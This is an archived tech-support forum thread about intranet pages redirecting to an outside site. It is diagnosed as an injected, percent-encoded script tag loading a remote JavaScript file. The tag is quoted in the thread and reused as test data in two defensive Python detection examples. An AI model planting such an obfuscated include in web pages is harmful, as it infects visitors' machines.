Solved

Web pages are being redirected

Posted on 2008-10-27
27
800 Views
Last Modified: 2013-12-14
Hi All,
It seems that our web pages are being redirected to http://www.365http.cn/tt/logo.htm every time the users try to access an intranet site.
Kronos1.doc
Question by:afsaleh
27 Comments
 
LVL 3

Assisted Solution

by:mrwalker15
mrwalker15 earned 200 total points
ID: 22814423
Your DNS cache has been poisoned. Clear the DNS cache from all your DNS servers.
0
 
LVL 5

Expert Comment

by:AncientFrib
ID: 22814453
Ensure there aren't any bad entries for the intranet DNS record on your DNS server.  Run from the command prompt: IPconfig /flushdns on your DNS servers and clients.  Good luck.
0
 

Author Comment

by:afsaleh
ID: 22814722
How can I clear the DNS cache on the DNS servers?
0
 

Author Comment

by:afsaleh
ID: 22814791
Tried running ipconfig /flushdns on both clients and DNS servers, but it did not work.
0
 
LVL 12

Assisted Solution

by:hfraser
hfraser earned 200 total points
ID: 22814805
Make sure you flush the caches on both your internal DNS server, and your firewall's DNS server. Either or both could be poisoned.

If you have the opportunity, you can dump the DNS server's caches before flushing them to check for poisoning. Also, current releases of DNS servers should be resistant to DNS poisoning, so make sure your DNS server is an up-to-date release. If it got poisoned once, it can happen again unless you change something to prevent it.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22814845
Are you using Microsoft DNS Servers? If so, go to DNS mmc console.

Add or select (highlight it) the server. Right-click and select Clear DNS cache.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22814862
To help prevent cache poisoning, under the DNS MMC console:

Select the server

Right-click Properties > Advanced tab

Make sure "Secure cache against pollution" option is set.

Also, if you have a proxy server you may need to clear the cache there too.
0
 

Author Comment

by:afsaleh
ID: 22815187
Tried clearing the cache on the DNS server, but the problem remains.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22815222
Can you post the source code of the webpage in the picture?
0
 
LVL 12

Expert Comment

by:hfraser
ID: 22815235
Let's verify DNS is actually the issue. From a command shell, do an nslookup for one of your intranet sites that users are having trouble with. What is the response?
0
 

Author Comment

by:afsaleh
ID: 22816039
When doing nslookup on a local intranet site, the result is the name of the DNS server.com and its IP address.
0
 
LVL 12

Expert Comment

by:hfraser
ID: 22816939
You should see something like

Server:            192.168.1.1
Address:      192.168.1.1#53

Name:      www.domain.com
Address: 192.168.1.2

If you resolve an address on the Internet against your DNS server, you should see something like:

nslookup www.google.com
Server:            192.168.1.1
Address:      192.168.1.1#53

Non-authoritative answer:
www.google.com      canonical name = www.l.google.com.
Name:      www.l.google.com
Address: 72.14.205.99
Name:      www.l.google.com
Address: 72.14.205.104
Name:      www.l.google.com
Address: 72.14.205.147
Name:      www.l.google.com
Address: 72.14.205.103

The difference is that you're not the authoritative source for www.google.com

Is this not similar to what you see?
0
 
LVL 3

Assisted Solution

by:mrwalker15
mrwalker15 earned 200 total points
ID: 22817315
Can you post the source code of the webpage?
0
 

Author Comment

by:afsaleh
ID: 22820379
When doing the nslookup, I do see the same info as you have displayed, with the exception of the port #.
The first line will refer to the domain controller / DNS controller / WINS server, while the second line refers to the actual application server.

Also please find attached the source code for the webpage.

Thanks
portal.txt
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22821378
Your webpage was hacked.

Please remove the top line.
<script language=javascript src=http://%77%2E%63%38%38%6A%2E%63%6E/lg.js></script>

That points to w.c88j.cn/lg.js
0
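As an added example (not code from this thread or the poster's portal.txt), the check below does what the comment above does by hand: it finds every external script include in a page, percent-decodes the host (the quoted line encodes w.c88j.cn) and flags includes whose host is percent-encoded or not on an allowlist. The sample HTML and the allowlist are constructed for the demonstration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample page: the injected line quoted in the thread, one
# relative include and one include from the (assumed) intranet host.
SAMPLE_HTML = """<script language=javascript src=http://%77%2E%63%38%38%6A%2E%63%6E/lg.js></script>
<html><head><title>Portal</title>
<script src="/js/app.js"></script>
<script src="http://intranet.example.local/lib/menu.js"></script>
</head></html>"""

# Hosts this site is expected to load scripts from (assumed allowlist).
ALLOWED_HOSTS = {"intranet.example.local"}

# Captures the src value of a <script> tag, quoted or bare.
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?([^\s"\'>]+)', re.IGNORECASE)


def decode_host(src):
    """Percent-decode a script URL and return its hostname (None for relative paths)."""
    return urlsplit(unquote(src)).hostname


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (raw_src, decoded_host, reasons) for every external script include
    that hides its host behind percent-encoding or points outside the allowlist."""
    findings = []
    for raw in SCRIPT_SRC.findall(html):
        host = decode_host(raw)
        if host is None:          # relative include such as /js/app.js
            continue
        reasons = []
        if "%" in urlsplit(raw).netloc:
            reasons.append("percent-encoded host")
        if host not in allowed_hosts:
            reasons.append("host not in allowlist")
        if reasons:
            findings.append((raw, host, reasons))
    return findings


if __name__ == "__main__":
    for raw, host, reasons in find_suspicious_scripts(SAMPLE_HTML):
        print(f"{raw} -> {host}: {', '.join(reasons)}")
```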
 

Author Comment

by:afsaleh
ID: 22821459
I did remove this line from the script, under view source. It keeps coming back.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22821603
You need to scan your web server for malware. It must have a process rewriting the line to the web page every time you update it.
Make sure you have all the latest patches available installed as well.
0
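One way to catch a process that keeps rewriting pages, as an added example rather than anything from this thread: baseline the web root with file hashes and re-hash it later, so the page that regains the injected line shows up as changed. The web root, page contents and the re-injection below are constructed inside a temporary directory; on a real server the baseline would be taken after the cleanup and compared on a schedule.

```python
import hashlib
import os
import tempfile

# The line quoted earlier in the thread, used here only to simulate the rewrite.
INJECTED_LINE = b'<script language=javascript src=http://%77%2E%63%38%38%6A%2E%63%6E/lg.js></script>\n'


def hash_tree(root):
    """Map each file's path relative to root to the SHA-256 of its contents."""
    digests = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Return (changed, added, removed) path lists between two hash_tree() results."""
    changed = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return changed, added, removed


def demo():
    """Constructed scenario: baseline a clean web root, then simulate the
    injected tag reappearing at the top of one page and report the difference."""
    with tempfile.TemporaryDirectory() as root:
        pages = {"default.htm": b"<html><body>Portal</body></html>\n",
                 os.path.join("help", "index.htm"): b"<html><body>Help</body></html>\n"}
        for rel, body in pages.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        baseline = hash_tree(root)
        # The rewrite the thread describes: the tag is prepended to a cleaned page.
        with open(os.path.join(root, "default.htm"), "wb") as fh:
            fh.write(INJECTED_LINE + pages["default.htm"])
        return diff_baseline(baseline, hash_tree(root))


if __name__ == "__main__":
    print(demo())
```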
 

Author Comment

by:afsaleh
ID: 22821670
What is the best scanner for this job? Tried a few, but none of them seem to work.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22821717
What is your web server?
0
 

Author Comment

by:afsaleh
ID: 22821750
windows 2000 sp4
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22821773
I would recommend Kaspersky AV, Spybot Search and Destroy, Secunia software advisor.

Patch everything UP straight away. If possible, turn off external access as this server is infected.

And run away from Windows 2000. It is a security hole!
0
 

Author Comment

by:afsaleh
ID: 22823609
Ran Spybot on the server and on the clients. Did not find anything. The application will run fine on the server, but gets hijacked on the clients.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22823882
Ok, it seems that this is a code injection via ARP spoofing.

Can you see in the IIS logs if users are actually connecting to IIS to browse the webpage?
0
 
LVL 12

Assisted Solution

by:hfraser
hfraser earned 200 total points
ID: 22828877
This is a virus with a payload that downloads a bunch of other code. If you've viewed this page from a browser on your web server, it's infected as well as the clients that view the page.

Shut down the web server before anything else gets infected. This isn't spyware. It's a virus/trojan. As mrwalker15 mentioned, run an anti-virus on the server and the clients. It's recognized by all the major ones. Check out:

http://virscan.org/report/00406cc94d36b929bb659b0241e2219b.html

to make sure your AV is up-to-date for this virus.
0
 

Author Comment

by:afsaleh
ID: 22850544
That works, thanks
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22850993
Hi afsaleh,

What did actually work?
0
 

Accepted Solution

by:
afsaleh earned 0 total points
ID: 22851584
Ran Spybot on both server and clients in safe mode. Also patched the server and clients with the latest security patches.
After rebooting to normal mode, flushed the DNS buffer on both server and client, and re-installed the IE browser.
0
